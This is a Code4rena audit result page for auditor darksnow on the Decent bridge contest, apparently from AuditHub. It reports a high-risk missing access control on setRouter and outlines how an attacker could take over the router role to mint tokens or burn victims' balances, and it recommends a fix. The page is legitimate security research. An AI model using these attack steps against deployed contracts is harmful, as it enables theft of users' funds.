Back to darksnow's contests

Decent - darksnow's results

Decent enables one-click transactions using any token across chains.

General Information

Platform: Code4rena

Start Date: 19/01/2024

Pot Size: $36,500 USDC

Total HM: 9

Participants: 113

Period: 3 days

Judge: 0xsomeone

Id: 322

League: ETH

Decent

Findings Distribution

Researcher Performance

Rank: 74/113

Findings: 1

Award: $0.12

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryDecent

Findings Information

🌟 Selected for report: NPCsCorp

Also found by: 0x11singh99, 0xAadi, 0xBugSlayer, 0xE1, 0xPluto, 0xSimeon, 0xSmartContract, 0xabhay, 0xdice91, 0xprinc, Aamir, Aymen0909, CDSecurity, DadeKuma, DarkTower, EV_om, Eeyore, GeekyLumberjack, GhK3Ndf, Giorgio, Greed, Inference, JanuaryPersimmon2024, Kaysoft, Krace, Matue, MrPotatoMagic, NentoR, Nikki, PUSH0, Soliditors, Tendency, Tigerfrake, Timeless, Timenov, ZanyBonzy, ZdravkoHr, abiih, adeolu, al88nsk, azanux, bareli, boredpukar, cu5t0mpeo, d4r3d3v1l, darksnow, deth, dutra, ether_sky, haxatron, ke1caM, kodyvim, m4ttm, mgf15, mrudenko, nmirchev8, nobody2018, nuthan2x, peanuts, piyushshukla, ravikiranweb3, rouhsamad, seraviz, simplor, slylandro_star, stealth, th13vn, vnavascues, wangxx2026, zaevlad

Awards

0.1172 USDC - $0.12

Labels

bug
3 (High Risk)
satisfactory
sufficient quality report
duplicate-721

External Links

Link to GitHub issue

Lines of code

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20-L30 https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DecentEthRouter.sol#L301-L335

Vulnerability details

Impact

Lack of access control in setRouter function poses a risk of potential protocol disruption.

Anyone can set his own address as the router and then access mint and burn functions of DcntETh.

In addition DecentEthRouter can't anymore use these functions:

  • addLiquidityEth
  • removeLiquidityEth
  • addLiquidityWeth
  • removeLiquidityWeth

Proof of Concept

After attacker calls setRouter(attackerAddress) he then can:

  1. call mint(attackerAddress, anyAmount) bypassing onlyRouter modifier
  2. call burn(victimAddress, victimBalance) bypassing onlyRouter modifier

Tools Used

Manual review.

setRouter should have onlyOwner modifier.

Assessed type

Access Control

#0 - c4-pre-sort

2024-01-23T21:18:09Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2024-01-23T21:18:16Z

raymondfam marked the issue as duplicate of #14

#2 - c4-judge

2024-02-03T13:31:49Z

alex-ppg marked the issue as satisfactory

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter